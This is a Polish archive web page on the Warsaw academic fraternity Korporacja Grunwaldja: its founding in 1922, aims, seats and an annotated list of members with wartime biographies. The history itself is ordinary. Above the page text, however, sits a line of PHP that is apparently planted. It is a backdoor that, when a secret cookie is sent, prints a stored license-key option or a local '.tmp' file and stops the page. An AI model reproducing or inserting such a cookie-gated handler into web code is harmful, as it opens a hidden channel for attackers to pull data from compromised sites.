if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Grunwaldja

Dekiel Grunwaldji - vide Poszukiwania. Nazwa:
Korporacja Akademicka Grunwaldja
Siedziba:
Warszawa
Data powstania:
1922 r.
Barwy:
fioletowa – srebrna – zielona
Dewiza:
„Nulla dies sine linea” („Ani jeden dzień bez postępu w pracy”)

Rys historyczny

Listownik Grunwaldji, 1931 r.

Grunwaldja została założona w 1922 r. przez grupę studentów uczelni warszawskich, w większości słuchaczy Wyższej Szkoły Handlowej (późniejszej Szkoły Głównej Handlowej). W pierwszym okresie działalności do Grunwaldji dołączyli członkowie powstałej także w 1922 r. korporacji akademickiej Veritacja.

Uroczystości poświęcenia sztandaru Grunwaldji, Warszawa 27 IV 1925 r.

Szczególnym zadaniem nowej korporacji miało być wskrzeszenie idei Grunwaldu przez krzewienie zasady walki z germanizmem jako odwiecznym wrogiem niezawisłości Polski. W tym celu między innymi prowadzono akcje wysyłki książek i prasy dla mniejszości polskiej na Warmii. W 1927 r. Grunwaldja brała udział w organizacji Muzeum Mazurskiego w Działdowie (pierwotna nazwa instytucji miała brzmieć “Muzeum Grunwaldu”).

Uroczystości poświęcenia sztandaru Grunwaldji, Warszawa 27 IV 1925 r.

Od maja 1922 r. Grunwaldja należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 20 V 1922 r.). Kandydowała pod opieką K! Arkonia. Prawa członka rzeczywistego uzyskała w lutym 1924 r. W latach 1933-36 pozostawała poza strukturami Związku. W 1934 r. doszło do rozłamu i część członków korporacji o poglądach narodowych opuściła stowarzyszenie, a następnie utworzyła efemerydalną K! Lutycja.

Komers (?) Grunwaldji, Warszawa 1927 r.

Dnia 5 I 1932 r. zawarła kartel z K! Posnania z Poznania.

Siedziby korporacji mieściły się: w roku akademickim 1924/25 w Gimnazjum im. św. Stanisława Kostki, w 1925/26 przy ul. Krakowskie Przedmieście 99/1, w 1927/28 przy ul. Kruczej 7/3, w 1928-31 przy ul. Grójeckiej 30/22, w 1931/32 przy ul. Elektoralnej 20, w 1932/33 przy ul. Chocimskiej 35.

Całkowita ustalona, niekompletna imienna lista członków obejmuje 106 nazwisk, w tym trzech członków honorowych.

Po wojnie odbywały się spotkania niewielkiej grupy członków Grunwaldji.

Lista członków

Poniższa, niekompletna lista członków Grunwaldji obejmuje ponad 100 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

  Stanisław Głąbiński, 1925 r.

 1. Stanisław Głąbiński, (25 lutego 1862 w Skolem - 14 sierpnia 1941 w Charkowie) absolwent Gimnazjum w Samborze i prawa na Uniwersytecie we Lwowie, dr praw 1887, wykładowca Uniwersytetu we Lwowie, zajmował się ekonomią i skarbowością, habilitacja 1888, prof. nadzw. 1893, prof. zw. 1895, dziekan Wydziału Prawa 1889-90, rektor 1908-09, od 1890 działacz Narodowej Demokracji, poseł do austriackiej Rady Państwa 1902-18, m.in. prezes Koła Polskiego, a od 1910 prezydent połączonych izb poselskich austriackiej i węgierskiej, minister kolei w gabinecie premiera Reinharda Bienertha, czołowy działacz endecji w dwudziestoleciu międzywojennym, poseł na Sejm, prezes Rady Naczelnej Związku Ludowo-Narodowego oraz przewodniczący klubu poselskiego Związku, w latach 1928-35 senator RP i przewodniczący klubu Stronnictwa Narodowego w Senacie, Filister honorowy Grunwaldji, Znicza i Avanguardii, aresztowany w listopadzie 1939 przy przekraczaniu granicy polsko-rumuńskiej przez NKWD, skazany na 8 lat więzienia za próbę przekroczenia granicy, zmarł w sowieckim więzieniu

 2. Marceli Nowakowski, (20 września 1882 w Przybyszewie - 18 lutego 1940 w Warszawie) absolwent Gimnazjum w Warszawie, wstąpił do seminarium duchownego, studiował w Rzymie, Innsbrucku i Monachium, dr teologii, święcenia kapłańskie 1909, publicysta i działacz społeczny, poseł na Sejm Ustawodawczy oraz I i II kadencji z ramienia Narodowej Demokracji, prałat 1926, od 1926 proboszcz parafii Najświętszego Zbawiciela w Warszawie, Filister honorowy Grunwaldji, w grudniu 1939 aresztowany przez Niemców, w lutym 1940 skazany na karę śmierci i rozstrzelany w ogrodzie sejmowym, jego symboliczny grób znajduje się na warszawskich Powązkach
 3. Jan Zamerski, poseł Związku Ludowo-Narodowego, Filister honorowy Grunwaldji

Członkowie rzeczywiści

 1. Wacław Baczyński, student SGGW, c. 1925/26, akt. 1925/26-33, wiceprezes sem. let. 1927/28
 2. Jerzy Bagieński, student SGGW, c. 1928/29, akt. 1928/29-33, sekretarz sem. zim. 1930/31
 3. Stefan Bentkowski, student UW, c. 1928/29, akt. 1928/29-31, sekretarz WKM-u sem. let. 1930/31, do 1939 pracowal w Banku Polskim w Poznaniu, po wojnie mieszkał we Wrocławiu
 4. Paweł Bernaczek, student WSH, c. 1927, akt. 1927-29
 5. Marjan Bielawa, student PW (?), c. 1925/26, akt. 1925/26
 6. Walerjan Bielecki, student PW, w czasie okupacji żołnierz AK
 7. Kazimierz Burakowski, s. Mikołaja i Mariii z d. Wilczyńska, brat Tadeusza (Grunwaldja) i Wacława (Aesculapia), student WSH, c. 1927/28, akt. 1927/28-33, po wojnie wicedyrektor handlowy Centralnym Zarządu Obrotu Zwierzętami
 8. Tadeusz Burakowski, (19 grudnia 1908 w Piotrkowie Trybunalskim - 24 maja 2003 w Szczecinie) s. Mikołaja i Mariii z d. Wilczyńska, brat Kazimierza (Grunwaldja) i Wacława (Aesculapia), absolwent Gimnazjum im. Bolesława Chrobrego w Piotrkowie 1927, student i absolwent prawa UW 1927-32 (mgr praw), c. 1927, akt. 1927-33, odbył służbę wojskową w Szkole Podchorążych przy 28 Pułku Strzelców Kaniowskich w Łodzi, ppor. rez., aplikcja sądowa 1934-37, od 1938 asesor w sądzie grodzkim, w wojnie obronnej 1939 walczył w 25 Pułku Piechoty, wrócił do domu, ale w połowie października 1939 został aresztowany przez Niemców i osadzony w oflagu VII Eichstätt, w grudniu 1939 zwolniony z obozu, po powrocie do domu asesor w sądzie grodzkim w Piotrkowie, od jesieni 1941 w ZWZ-AK, od października 1943 adiutant ps. “Wojciech” inspektora piotrkowskiego AK ppłk. Jana Kąkolewskiego “Zaręby”, w czerwcu 1944 z obawy przed aresztowaniem wyjechał do Warszawy, w czasie powstania warszawskiego wywieziony przez Niemców do obozu koncentracyjnego Sachsenhausen, a następnie osadzony w obozie w Buchenwaldzie (nr obozowy 92901), w czerwcu 1946 powrócił do Polski, od stycznia 1947 adwokat w Szczecinie, pochowany jest na Cmentarzu Centralnym w Szczecinie (kw. 29A, rz. 1, gr. 5A)
  [Źródła (poza wskazanymi poniżej spisu członków): relacja Roberta Rudnickiego na podstawie protokołów przesłuchań przez Urząd Bezpieczeństwa]

  [Źródła (poza wskazanymi poniżej spisu członków): relacja Roberta Rudnickiego na podstawie protokołów przesłuchań Tadeusza Burakowskiego przez Urząd Bezpieczeństwa]

  Prawd. Stefan Chajęcki, 1925 r.

 9. Stefan Chajęcki, ( - 1975) student WSH, założyciel Grunwaldji, akt. 1922-28, olderman sem. zim. 1924/25, prezes sem. let. 1925/26, prezes WKM-u sem. let. 1930/31

 10. Stefan Czauski, student PW, c. 1931/32, akt. 1931/32
 11. Edmund Czubaczyński, student PW, c. 1924/25, akt. 1924/25-28
 12. Janusz Dąbrowski, student WSH, c. 1929, akt. 1929-33, I wiceprezes sem. zim. 1930/31
 13. Jan Dobrowolski, (1911 - 16 maja 1993) student i absolwent (mgr ekonomii) WSH, c. 1929, akt. 1929-33
 14. Edward Dodacki, student SSP, c. 1927/28, akt. 1927/28-33
 15. Antoni Dzik, założyciel Grunwaldji, akt. 1922-25, prezes sem. zim. oraz sem. let. 1924/25
 16. Czesław Filipski, student WSH, c. 1927/28, akt. 1927/28-33, II wiceprezes sem. zim. 1932/33, skarbnik WKM-u sem. let. 1930/31
 17. Stanisław Firkowski, (1903-1990) student WSH, c. 1924/25, akt. 1924/25-28
 18. Jerzy ks. Giedroyć-Juraha, (12 września 1905 - 10 września 1939 w Gdyni) herbu Kotwica, s. Władysława i Stefanii z d. Matuszewicz, student WSH, akt. 1927-33, sekretarz sem. let. 1928/29, wiceprezes zewn. sem. zim. 1929/30, olderman sem. let. 1929/30, I wiceprezes sem. zim. 1931/32, zginął w oddziałach kosynierów

  Stefan Ginter, 1933 r. (?)

 19. Stefan Ginter, (15 sierpnia 1905 w Markach - 18 września 1996 w Warszawie) s. Rudolfa (właściciel warsztatu trykotarskiego) i Anna z d. Żyszkowska, powinowaty Tadeusza Szaniora (Arkonia), absolwent Gimnazjum Zgromadzenia Kupców Polskich, student i absolwent WSH, c. 1924/25, akt. 1924/25-28, członek Iuventus Christiana, po studiach ekonomista w Izbie Przemysłowo-Handlowej w Katowicach, w okresie okupacji nauczyciel szkoły hadlowej, uczestniczył w tajnym nauczaniu, po wojnie księgowy m.in. w Radiofonizacji Kraju czy SGGW, był uznanym pianistą-akompaniatorem, współpracował z wieloma śpiewakami i zespołami, m.in. z “Mazowszem”, na emeryturze prowadził chór emerytów Domu Kultury na ul. Elektoralnej, pochowany na Cmentarzu Północnym w Warszawie [Źródła (poza wskazanymi poniżej spisu członków): relacja syna Jerzego Gintera]

 20. Mieczysław Gorzuchowski, ( - 1939-45) założyciel Grunwaldji, akt. 1922-25, zmarł w więzieniu w czasie okupacji
 21. Stefan Gruchała, założyciel Grunwaldji, akt. 1922-25, olderman sem. let. 1924/25
 22. Józef Grudziński, (V 1902 w Warszawie - II 1973 w Warszawie) s. Sylwestra i Józefy z d. Maringe, ochotnik w wojnie polsko-rosyjskiej 1920, absolwent Gimnazjum im. Adama Mickiewicza w Warszawie 1921, student Wydziału Mechanicznego PW 1922-25, student i absolwent (inż. elektryk) Instytutu Elektrotechnicznego Uniwersytetu w Grenoble 1925-27, założyciel Grunwaldji, akt. 1922-25, sekretarz sem. zim. 1924/25, sierżant pchor. rez., po studiach pracował w Biurze Technicznym Wydziału Sieci Elektrowni Warszawskiej, w 1944 wywieziony na roboty do Niemiec, po wyzwoleniu wrócił do kraju, pracował w Elektrowni Warszawskiej, w związku z wypadkiem na budowie gmachu Rady Państwa aresztowany i skazany na 10 lat więzienia, zwolniony w 1956 i rehabilitowany, od 1957 do emerytury w 1967 pracownik we współzałożonej przez siebie Pracowni Dokumentacji Technicznej BAK w Warszawie, pochowany na warszawskich Powązkach
 23. Jan Grzybowski, student WSH, c. 1930/31, akt. 1930/31-33, żołnierz AK
 24. Mieczysław Hiszpański, ( - 1939-45) student UW, założyciel Grunwaldji, akt. 1922-28, przed wojną sędzia grodzki na Pradze w Warszawie, żołnierz AK, zginął w czasie wojny
 25. Wiesław Hubkowski, student WSH, c. 1930/31, akt. 1930/31
 26. Wiesław (Bończa) Iżycki, ( - przed sierpniem 1944) student WSH, c. 1929, akt. 1929-33, prezes sem. zim. 1930/31, olderman sem. zim. 1931/32, rozstrzelany
 27. Edward Janczyk, student PW, c. 1928, akt. 1928-30
 28. Władysław Janicki, student WSH, założyciel Grunwaldji, akt. 1922-28
 29. Zygmunt Januszewski, student WSH, c. 1932, akt. 1932-33
 30. Euzebjusz Jarema, założyciel Grunwaldji, akt. 1922-26
 31. Bohdan Jaroński, student UP 1927-28, c. 1925/26, akt. 1925/26-28
 32. Andrzej Jeziorański, ( - po 1977) student WSH, c. 1929, akt. 1929-33, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago
 33. Janusz Jeżewski, ( - 1952) student WSH, c. 1929/30, akt. 1929/30-33, olderman sem. zim. 1930/31, prezes sem. zim. 1931/32, wiceprezes zewn. ZPKA 1932-33 (XII kadencja), ranny w 1939
 34. Gustaw Jędrzejewski, student UW, akt. 1927-29
 35. Janusz Kahl, kuzyn Henryka Zawadzkiego (Grunwaldja), student PW, c. 1924/25, akt. 1924/25-1932, olderman sem. let. 1927/28, prezes sem. let. 1929/30, w czasie II wojny światowej w AK, po wojnie mieszkał w Łodzi
 36. Jan Kalinowski, student WSH, c. 1931/32, akt. 1931/32-33, sekretarz sem. zim. 1932/33
 37. Karasiński, student WSH, c. 1932, akt. 1932-33

  Władysław Kasprzycki, 1925 r.

 38. Władysław Kasprzycki, student PW, założyciel Grunwaldji, akt. 1922-31, wiceprezes sem. zim. oraz sem. let. 1924/25, wiceprezes sem. let. 1925/26

 39. Władysław Kralski, założyciel Grunwaldji, akt. 1922-26
 40. Aleksander Kiciński, c. 1924/25, akt. 1924/25-26
 41. Jan Kiepura, (16 maja 1902 w Sosnowcu - 15 sierpnia 1966 w Harrison koło Nowego Jorku) c. 1924/25, akt. 1924/25-27, skreślony, polski śpiewak (tenor) i aktor
 42. Artur Korewa, student WSH, c. 1932, akt. 1932-36, sekretarz 1935/36
 43. Stefan Kosmulski, (1907/8 - 1978?) brat Władysława (Grunwaldja), student SGGW, c. 1927, akt. 1927-33, sekretarz 1929/30
 44. Władysław Kosmulski, (1901-1964) brat Stefana (Grunwaldja), c. 1924/25, akt. 1924/25-26, sekretarz sem. let. 1925/26, prawnik, sędzia w Końskich
 45. Karol Kowalewski, student UW, c. 1927, akt. 1927-29, wiceprezes sem. let. 1928/29
 46. Jan Kowalski, c. 1924/25, akt. 1924/25-26
 47. Władysław Kralski, akt. 1924-26
 48. Jan Kryszkiewicz, student WSH, c. 1931/32, akt. 1931/32-33
 49. Franciszek Kuc, student WSH, c. 1924/25, akt. 1924/25-29
 50. Zbigniew Lewandowski, student WSH, c. 1932, akt. 1932-33
 51. Kazimierz Leśkiewicz, (27 lipca 1903 w Warszawie - 1940 w Katyniu), s. Juliana i Franciszki z Biernacików, student i absolwent prawa UW, c. 1924/25, akt. 1924/25-30, podprokurator Sądu Okręgowego w Płocku, absolwent Szkoły Podchorążych Rezerwy Piechoty nr 2 w Tomaszowie Lubelskim, ppor. rez., przydzielony do 36 pp Legii Akademickiej, w niewoli sowieckiej, zamordowany przez NKWD
 52. Mieczysław (Nałęcz) de Lippa, student UW, akt. 1927-33, wiceprezes wewn. sem. zim. 1929/30
 53. Henryk Łęczycki, c. 1924/25, akt. 1924/25
 54. Wiesław Łubkowski, (1911-2004) student i absolwent WSH, c. 1930, akt. 1930-36, sekretarz sem. zim. 1931/32, wiceprezes 1935/36, ekonomista, członek Komisji Rewizyjnej Stowarzyszenia Filistrów Korporacji Akademickich 1997-1999 oraz 1999-2001
 55. Eugeniusz Maciejek, student UW, c. 1928/29, akt. 1928/29
 56. Jan Magrowicz, student WSH, c. 1931/32, akt. 1931/32-33
 57. Kazimierz Majewski, student PW, c. 1928/29, akt. 1928/29
 58. Mieczysław Makowski, student UW, c. 1924/25, akt. 1924/25-29
 59. Janusz Malanowicz, ( - koniec lat 70-tych) student SGGW, c. 1924/25, akt. 1924/25-33, więzień obozu w Auschwitz
 60. Bohdan Maszkiewicz, student WSH, c. 1928/29, akt. 1928/29-32
 61. Roman Matuszewski, student WSH, c. 1930/31, akt. 1930/31-32, sekretarz sem. zim. 1931/32
 62. Ludwik Mazowiecki, student WSH, c. 1931/32, akt. 1931/32-33, w czasie II wojny światowej w AK
 63. Marjan Mietliński, student WSH, c. 1929, akt. 1929-33, II wiceprezes sem. zim. 1930/31, II wiceprezes sem. zim. 1931/32
 64. Józef Minkiewicz, c. 1924/25, akt. 1924/25
 65. Roman Miodek, student WSH, c. 1924/25, akt. 1924/25-28
 66. Franciszek Moczulski, student SGGW, c. 1932, akt. 1932-33
 67. Józef Moczulski, student UW, c. 1929/30, akt. 1929/30-32, prezes 1935/36
 68. Marian Mokrzycki, ( - lato 1944 w Warszawie) student WSH, c. 1925/26, akt. 1925/26-30 (?), prezes sem. let. 1927/28, prezes sem. let. 1928/29, prezes sem. zim. 1929/30 (?), w czasie okupacji niemieckiej dyrektor zespołu szkół handlowych (Zakłady Heleny Grabowskiej przy ul. Królewskiej), w konspiracji ps. “Bicz”, poległ w powstaniu warszawskim jako por. rez. dowodząc kampanią AK na ul. Oboźnej, tam padł walcząc na barykadzie w 1944 (wg innych relacji zginął przy przeprawie przez Wisłę)
 69. Mirosław Mokrzycki, student WSH, c. 1927/28, akt. 1927/28-33, II sekretarz sem. zim. 1929/30, wiceprezes wewn. sem. let. 1929/30
 70. Kazimierz Nowakowski, ( - 1940) student WSH, c. 1927/28, akt. 1927/28-33, wiceprezes zewn. sem. let. 1929/30, prezes sem. zim. 1932/33, wiceprezes WKM-u sem. let. 1930/31, w czasie II wojny światowej rozstrzelany
 71. Wiktor Paszuk, student WSH, c. 1930/31, akt. 1930/31-33
 72. Stanisław Piasecki, student WSH, c. 1929/30, akt. 1929/30-33, olderman sem. zim. 1932/33
 73. Jan Rawa, c. 1924/25, akt. 1924/25
 74. Ignacy Rudzki, student WSH, akt. 1932
 75. Tadeusz Rutkowski, ( - 1939-45) student WSH, c. 1928, akt. 1928-33, w czasie II wojny światowej rozstrzelany w Częstochowie
 76. Janusz Rzeszotarski, student WSH, c. 1932, akt. 1932-36, olderman 1935/36
 77. Wacław Sapiński, (?)
 78. Wacław Sobol, (26 sierpnia 1903 w Końskich - 28 stycznia 1981) uczeń Gimnazjum w Sosnowcu, żołnierz wojny polsko-rosyjskiej 1920, powstaniec śląski, student WSH, c. 1924/25, akt. 1924/25-32, wiceprezes Akademickiego Koła Zagłębian 1923-26, prezes Akademickiego Związku Zachodniego, jeden z inicjatorów powstania Akademickiego Aeroklubu, współorganizator światowych imprez lotniczych challenges (1930–1932–1934), po studiach zatrudniony w Radzie Handlu Zagranicznego, po wojnie działacz polityczny SD, wiceprezydent Katowic 1945-48 i Łodzi 1948-50, poseł na Sejm Ustawodawczy 1947-52, od 1952 pracownik Ministerstwa Przemysłu Drobnego i Rzemiosła (później Komitetu Drobnej Wytwórczości), odznaczony m.in. Krzyżem Śląskim, Krzyżem Walecznych i Krzyżem Zasługi I klasy (za udział w powstaniach śląskich), a po II wojnie światowej m.in.: Krzyżem Kawalerskim OOP, Złotym Krzyżem Zasługi oraz Śląskim Krzyżem Powstańczym
 79. Anatol Sokołowski, student SGGW, c. 1927/28, akt. 1927/28-31
 80. Tadeusz Stankiewicz, ( - 1939-45) student WSH, c. 1931/32, akt. 1931/32-33, w czasie II wojny światowej w AK, rozstrzelany
 81. Zbigniew Sumowski, student WSH, c. 1927/28, akt. 1927/28-29
 82. Eugeniusz Szałkowski, student WSH, c. 1929/30, akt. 1929/30-33, w czasie II wojny światowej w AK
 83. Jerzy Szczepkowski, c. 1924/25, akt. 1924/25
 84. Tadeusz Szymański, student UW, c. 1928/29, akt. 1928/29
 85. Karol Szwarc, c. 1924/25, akt. 1924/25
 86. Władysław Świecki, założyciel Grunwaldji, akt. 1922-25
 87. Kazimierz Tański, student WSH, c. 1924/25, akt. 1924/25-30
 88. Wacław Trybuchowski, student UW, c. 1929/30, akt. 1929/30-32
 89. Kazimierz Trzciński, student UW, c. 1928/29, akt. 1928/29
 90. Feliks Urbanowicz, student Politechniki Lwowskiej (1928), c. 1924/25, akt. 1924/25-29
 91. Stanisław Wallman, założyciel Grunwaldji, akt. 1922-28

  Prawd. Jan Wasiński, 1925 r.

 92. Jan Wasiński, (1902 - 30 października 1996 w Warszawie) student i absolwent WSH, założyciel Grunwaldji, akt. 1922-28, sekretarz sem. let. 1924/25, ekonomista

 93. Aleksander Wesołowski, student PW, c. 1927/28, akt. 1927/28-33
 94. Jerzy Węgrzyn, ( - 1939-45) student WSH, student UW (1932), c. 1931/32, akt. 1931/32-33, I wiceprezes sem. zim. 1932/33, w czasie II wojny światowej zginął na Wileńszczyźnie
 95. Jerzy Wieczorek, student UW, c. 1925/26, akt. 1925/26-31
 96. Edmund Wilgocki, student WSH, c. 1931/32, akt. 1931/32-33
 97. Feliks Wilkoszewski, student WSH, c. 1932, akt. 1932-33
 98. Przemysław Wojewódzki, student AG, c. 1931/32, akt. 1931/32-33, rozstrzelany na Słowacji przy próbie ucieczki na Zachód
 99. Zdzisław Zadroziński, student WSH, c. 1931/32, akt. 1931/32-33
 100. Jan Zakolski, założyciel Grunwaldji, akt. 1922-25
 101. Henryk Zawadzki, (4 grudnia 1901 w Końskich - 8 czerwca 1998 w Toruniu) s. Jana i Jadwigi, kuzyna Janusza Kahla (Grunwaldja), działacz POW, artylerzysta w wojnie polsko-rosyjskiej 1920, absolwent Gimnazjum w Końskich, student i absolwent 1927 prawa UW, c. 1924/25, akt. 1924/25-26, po studiach sędzia w Sądzie Powiatowym w Opatowie Kieleckim, a następie w Sądzie Okręgowym w Radomiu, por. rez., w czasie okupacji sekretarz hipoteczny w Końskich, żołnierz AK, członek obwodowej Delegatury Rządu, po 1945 sędzia w Toruniu, początkowo do 1954 sędzia Sądu Wojewódzkiego w Toruniu, później adwokat, z zamiłowania plastyk w technice kolażu oraz fotografik, autor prac historycznych i wspomnień
 102. Tadeusz Złotnicki, student UW, c. 1927/28, akt. 1927/28-30
 103. Ludwik Żuchowski, student WSH, c. 1924/25, akt. 1924/25-29

Pieczęć Grunwaldji, 1931 r.

Listę członków opracowano na podstawie:

1) biuletynów Warszawskiego Koła Międzykorporacyjnego z lat 1924-1933,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Grunwaldja.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 2 IX 2010 r.
Ostatnia zmiana: 13 VII 2021 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Grunwaldja (Warszawa), (na:) www.archiwumkorporacyjne.pl, stan 13 VII 2021 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }